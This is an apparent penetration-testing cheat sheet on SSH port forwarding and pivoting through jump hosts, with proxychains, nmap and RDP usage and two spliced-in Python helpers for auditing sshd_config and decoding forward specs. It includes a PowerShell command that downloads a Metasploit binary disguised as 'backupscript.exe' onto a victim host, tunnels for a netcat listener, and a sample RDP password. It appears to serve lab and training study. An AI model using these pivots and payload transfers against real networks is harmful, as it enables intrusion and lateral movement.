SSH

This is more of a cheat sheet for commands.


Last updated 7 months ago

Local Port Forwarding

Local Port Forwarding

 ssh -L 1234:localhost:3306 Ubuntu@10.129.202.64

Opens a listener on local port 1234 (our machine) and sends all traffic to remote port 3306 (10.129.202.64).

Forwarding multiple ports

 ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

This SSH command connects to a remote machine and sets up two local port forwards:

  1. Local port 1234 forwards to port 3306 on the remote machine (typically MySQL).

  2. Local port 8080 forwards to port 80 on the remote machine (typically HTTP).

Local Port Forwarding Example

jumphost@ubuntu ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215

Opens a listener on port 4455 (CONFLUENCE01 jump host) and forwards all traffic through 10.4.50.215 to 172.16.50.217:445 (PGDATABASE01). Because the listener is bound to 0.0.0.0, it is reachable from any host that can reach the jump host, not only from localhost.

NOTE: The -N flag means do not execute a remote command, so no shell is opened.

Dynamic Port Forwarding - Tunneling over SOCKS proxy

A local port forward maps one listening port to one fixed destination socket. OpenSSH also supports dynamic port forwarding: from a single listening port, traffic can be forwarded to any socket the SSH server can route to. This works because the listening port acts as a SOCKS proxy.

Dynamic Port Forwarding from Attack Host:

attacker@kali$ ssh -D 9050 ubuntu@10.129.202.64

NOTE: The -D flag enables dynamic port forwarding & ssh acts as a SOCKS server.

$ tail -4 /etc/proxychains.conf

# meanwile
# defaults set to "tor"
socks4 	127.0.0.1 9050

Dynamic Port Forwarding From Jump Host:

jump-host@ubuntu$ ssh -D 9050 ubuntu@172.167.32.11

┌──(kali㉿kali)-[~]
└─$ tail -f /etc/proxychains4.conf
# defaults set to "tor"
#socks4         127.0.0.1 9050
socks5  192.168.198.63  9050 # Ip address of jump host

Using tools with Proxychains:

Nmap:

This is my preferred nmap command to run. (172.16.50.217 is on the internal network.)

kali@kali:~$ proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

xfreerdp:

kali@kali proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
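Every -L and -D forward above passes through the jump host's sshd, and whether that daemon permits it comes down to a few sshd_config directives. The following checker is an added example, not part of this cheat sheet: it parses the top-level directives (assuming no Match block overrides them) and reports which forward types the host would allow, run against two constructed configs.

```python
"""Audit sshd_config for the directives that decide whether a host can serve as a pivot:
-L/-D forwards out through it, or -R listeners on it. Added example, not from the page.
Defaults follow sshd_config(5); directives after a Match line are conditional and skipped."""
import re
from typing import Dict, List

DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no",
            "permitopen": "any", "permitlisten": "any"}

def parse_sshd_config(text: str) -> Dict[str, str]:
    cfg = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line:
            continue
        key, *rest = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        key = key.lower()
        if key == "match":        # assumption: nothing inside a Match block overrides these
            break
        if key in cfg and rest:
            cfg[key] = rest[0].strip()
    return cfg

def audit_sshd_config(text: str) -> List[str]:
    cfg = parse_sshd_config(text)
    fwd = cfg["allowtcpforwarding"].lower()
    findings = []
    if fwd in ("yes", "all", "local"):        # direct-tcpip channels: -L and -D
        findings.append(f"clients may open -L/-D forwards through this host "
                        f"(AllowTcpForwarding {fwd}, PermitOpen {cfg['permitopen']})")
    if fwd in ("yes", "all", "remote"):       # tcpip-forward requests: -R (incl. remote dynamic)
        findings.append(f"clients may open -R listeners on this host "
                        f"(AllowTcpForwarding {fwd}, PermitListen {cfg['permitlisten']})")
    if cfg["gatewayports"].lower() in ("yes", "clientspecified"):
        findings.append(f"-R listeners may bind non-loopback addresses "
                        f"(GatewayPorts {cfg['gatewayports']})")
    return findings

# Constructed sample configs (not taken from any real host).
WEAK_CONFIG = """\
AllowTcpForwarding yes
GatewayPorts clientspecified
"""
HARDENED_CONFIG = """\
AllowTcpForwarding no
GatewayPorts no
PermitOpen none
PermitListen none
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or ["no forwarding permitted"])
```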

Remote Port Forwarding

Also known as Reverse Port Forwarding. In real-world scenarios it is likely we'll encounter a firewall that heavily restricts inbound connections. Outbound connections, however, are less likely to be blocked.

Start SSH Service

kali:~$ sudo systemctl start ssh

Connect back to Kali Host

The command below opens port 2345 on localhost on our kali machine. All traffic sent to it is forwarded through the jump host to 10.4.50.215:5432.

victim@jump-host$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4

Verifying Port Forward

As we can see, our kali box is listening on 127.0.0.1:2345.

kali@kali$ ss -ntlpu                     
Netid            State             Recv-Q            Send-Q                       Local Address:Port                          Peer Address:Port            Process            
udp              UNCONN            0                 0                                  0.0.0.0:52704                              0.0.0.0:*                                  
tcp              LISTEN            0                 128                              127.0.0.1:2345                               0.0.0.0:*                                  
tcp              LISTEN            0                 128                                0.0.0.0:22                                 0.0.0.0:*                                  
tcp              LISTEN            0                 128                                   [::]:22                                    [::]:*      

Remote Dynamic Port Forwarding

NOTE: This tends to be the best setup for port forwarding during engagements: we get all the benefits of dynamic port forwarding along with those of a remote (reverse) forward.

Create Dynamic Remote Port Forward

Creating a dynamic remote port forward is similar to creating a remote port forward. We use -R but with only a port: we do not specify an address, and we do not use -D.

jumphost@ubuntu$ ssh -N -R 9998 kali@192.168.118.4

Update SOCKS Proxy - proxychains

kali@kali:~$ tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998 # IP address is localhost 127.0.0.1

Verifying Port Forward

As we can see, our kali box is listening on 127.0.0.1:9998.

kali@kali$ ss -ntlpu                     
Netid            State             Recv-Q            Send-Q                       Local Address:Port                          Peer Address:Port            Process            
udp              UNCONN            0                 0                                  0.0.0.0:52704                              0.0.0.0:*                                  
tcp              LISTEN            0                 128                              127.0.0.1:9998                               0.0.0.0:*                                  
tcp              LISTEN            0                 128                                0.0.0.0:22                                 0.0.0.0:*                                  
tcp              LISTEN            0                 128                                   [::]:22
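To keep the four forms above straight, the following script (an added example, not from this page) decodes an ssh -L/-R/-D argument and reports which side listens, on which address and port, where the traffic goes, and whether the bind address makes the listener reachable from other hosts; it also recognises the remote dynamic form (-R with only a port, OpenSSH 7.6 and later).

```python
"""Decode OpenSSH -L / -R / -D forwarding specs. Added example, not from the page."""
from dataclasses import dataclass
from typing import Optional

EXPOSED = {"0.0.0.0", "*", "::"}   # bind addresses that accept connections from any host

@dataclass
class Forward:
    kind: str            # "local", "remote", "dynamic" or "remote-dynamic"
    listen_side: str     # "client" (machine running ssh) or "server" (host you ssh into)
    bind: str
    port: int
    dest: Optional[str]  # "host:port" for -L/-R; None for a SOCKS proxy (any destination)

    @property
    def exposed(self) -> bool:
        # A non-loopback listener is reachable by anyone who can reach the listening host.
        # For -R this only takes effect if the server's GatewayPorts setting permits it.
        return self.bind in EXPOSED

def parse_forward(flag: str, spec: str) -> Forward:
    """flag is -L, -R or -D; spec is the argument exactly as typed on the command line."""
    if flag not in ("-L", "-R", "-D"):
        raise ValueError(f"unsupported flag {flag!r}")
    parts = spec.split(":")
    if flag == "-D" or (flag == "-R" and len(parts) <= 2):
        # [bind:]port only. -D opens a SOCKS proxy on the client; -R with just a port is
        # remote dynamic forwarding (OpenSSH 7.6+) and opens the SOCKS proxy on the server.
        bind, port = parts if len(parts) == 2 else ("127.0.0.1", parts[0])
        kind, side = ("dynamic", "client") if flag == "-D" else ("remote-dynamic", "server")
        return Forward(kind, side, bind, int(port), None)
    if len(parts) == 3:                       # port:host:hostport, loopback bind by default
        bind, (port, host, hostport) = "127.0.0.1", parts
    elif len(parts) == 4:                     # bind:port:host:hostport
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"bad forward spec {spec!r}")
    kind, side = ("local", "client") if flag == "-L" else ("remote", "server")
    return Forward(kind, side, bind, int(port), f"{host}:{hostport}")

def describe(flag: str, spec: str) -> str:
    f = parse_forward(flag, spec)
    target = f.dest or "SOCKS proxy (any socket the other side can route to)"
    warn = "  [reachable from other hosts]" if f.exposed else ""
    return f"{f.kind}: {f.listen_side} listens on {f.bind}:{f.port} -> {target}{warn}"

if __name__ == "__main__":
    # The specs from the commands on this page.
    for flag, spec in [("-L", "1234:localhost:3306"), ("-L", "0.0.0.0:4455:172.16.50.217:445"),
                       ("-D", "9050"), ("-R", "127.0.0.1:2345:10.4.50.215:5432"), ("-R", "9998")]:
        print(describe(flag, spec))
```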

Additional Info

Transferring Metasploit Binary to Victim (on internal network).

We may need to transfer a binary to a machine we've gained access to so we can port forward.

PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Tunneling to Kali Web Server

If the host has an ssh client we can connect back to our kali box to tunnel traffic.

This command tunnels all traffic through a jump host back to our kali web server. It is useful when downloading tools to a host inside an internal network.

C:\Users\web_svc>ssh -N -L 0.0.0.0:1234:192.168.45.186:8000 kali@192.168.45.186

Tunneling NC Listener

As with the command above, we can create the same kind of tunnel for an nc listener.

C:\Users\web_svc>ssh -N -L 0.0.0.0:1234:192.168.45.186:4444 kali@192.168.45.186

Tunnel Internal Web Service

As above, we can port forward an internal web service back to our kali host.

Reverse Port Forward

Run on the victim: kali listens on local_port and forwards to the web service on the victim's loopback interface (with -R, the first port is the one opened on the SSH server, i.e. kali).

victim@ubuntu ssh -N -R local_port:localhost:web_service_port kali@192.168.45.186

Local Port Forward

Run on kali: kali listens on local_port and forwards over the SSH connection to the web service on the victim's loopback interface.

kali@kali ssh -L local_port:localhost:web_service_port victim@victim_ip

Port Forwarding an Internal Web Service

Say we discover a web service that is running locally, or only allows 127.0.0.1 to authenticate. We can port forward the service back to our kali host and access it locally.

$ ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443